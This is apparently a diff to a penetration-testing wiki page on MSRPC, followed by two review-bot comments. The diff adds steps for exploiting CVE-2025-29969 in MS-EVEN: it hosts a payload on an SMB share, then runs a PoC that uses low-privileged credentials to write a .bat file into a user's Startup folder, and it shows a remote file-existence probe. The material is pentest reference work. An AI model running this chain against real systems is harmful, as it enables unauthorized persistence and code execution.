diff --git a/src/network-services-pentesting/135-pentesting-msrpc.md b/src/network-services-pentesting/135-pentesting-msrpc.md index e754f591f4a..c297e91c982 100644 --- a/src/network-services-pentesting/135-pentesting-msrpc.md +++ b/src/network-services-pentesting/135-pentesting-msrpc.md 
@@ -69,6 +69,36 @@ All options except `tcp_dcerpc_auditor` are specifically designed for targeting - **Named Pipe**: `\pipe\epmapper` - **Description**: DCOM interface, used for brute-force password grinding and information gathering via WM. + +### MS-EVEN (EventLog Remoting) primitives + +The **MS-EVEN** RPC interface (named pipe `\pipe\even`) exposes Eventlog operations. SafeBreach’s **CVE-2025-29969 (EventLog-in)** analysis shows a **TOCTOU** flaw in MS-EVEN that lets an **authenticated low-privileged** user trigger a **remote arbitrary file write** on the target: attacker-chosen content written to an attacker-chosen path without needing Administrator rights for the remote write. + +Operational pattern (PoC workflow): stage a **valid EVTX** plus your payload on an SMB share, then race the MS-EVEN logic so the target fetches the SMB-hosted file and writes it to the chosen path. + +```bash +impacket-smbserver -smb2support Share /tmp/safebreach +``` + +The published PoC uses a **hard-coded SMB share name** (`Share`), so if you change it you must also update the script. + +```bash +python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\Users\lowuser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\target.bat" +``` + +A common chain is to drop into a **per-user Startup folder** for persistence and execution on the next logon (execution occurs in that user context). + +#### MS-EVEN CreateFile-style primitive for recon + +MS-EVEN also exposes a **file open/create** primitive (described in the PoC as `CreateFile`) that can be used by any authenticated user to **probe whether a remote file or directory exists**. This is useful for software discovery by checking common install paths (e.g., `C:\Program Files\`): + +```bash +python check_if_exists.py 192.168.56.57 lowuser Password1! 
"C:\Program Files\Wireshark" + +Result: +FILE_EXISTS_AND_IS_DIRECTORY +``` + ### Identifying IP addresses Using [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver), comes from [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) is possible to abuse the _**ServerAlive2**_ method inside the _**IOXIDResolver**_ interface. @@ -226,6 +256,8 @@ A single out-of-bounds write or unexpected exception will be surfaced immediatel ## References +- [EventLogin-CVE-2025-29969 (SafeBreach-Labs)](https://github.com/SafeBreach-Labs/EventLogin-CVE-2025-29969) +- [EventLog-in: Propagating With Weak Credentials Using the Eventlog Service in Microsoft Windows](https://www.safebreach.com/blog/safebreach_labs_discovers_cve-2025-29969/) - [Automating MS-RPC vulnerability research (2025, Incendium.rocks)](https://www.incendium.rocks/posts/Automating-MS-RPC-Vulnerability-Research/) - [MS-RPC-Fuzzer – context-aware RPC fuzzer](https://github.com/warpnet/MS-RPC-Fuzzer) - [NtObjectManager PowerShell module](https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/tree/master/NtObjectManager)
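Review bot: The new `### MS-EVEN (EventLog Remoting) primitives` section states the impact (authenticated low-privileged user, remote arbitrary file write) but never records which Windows versions are affected or what the patch status of CVE-2025-29969 is, so a reader cannot tell whether a given host is even in scope; add one line on affected/patched builds taken from the linked SafeBreach write-up. Two style points in the same hunk: the `check_if_exists.py` fence mixes the command with its output (`Result:` / `FILE_EXISTS_AND_IS_DIRECTORY`), so either prefix the output lines with `#` or move them into their own block as the rest of the page does; and the `write_file_remotely.py` line hard-codes two IP addresses and a literal credential (`lowuser Test123`) without saying what each positional argument is, so replace them with labelled placeholders (`<target>`, `<smb-host>`, `<user>`, `<password>`) rather than environment-specific values. From the defender side, the workflow as written (the target pulls a file from an attacker-controlled SMB share and writes it under a per-user `Start Menu\Programs\Startup` folder) deserves one sentence on what that looks like in telemetry, since the section currently gives only the attacker's view.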
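Review bot: The two new entries at the top of `## References` do not follow the format of the existing ones, which carry year and source in parentheses (`(2025, Incendium.rocks)`); add `(2025, SafeBreach Labs)` or equivalent to both so the list stays consistent. Also note the body text calls the research "EventLog-in" while the first reference is titled `EventLogin-CVE-2025-29969`; the latter is the repository's own name, so keep it, but a short parenthetical in the body tying the two spellings together would avoid the reader thinking these are two different projects.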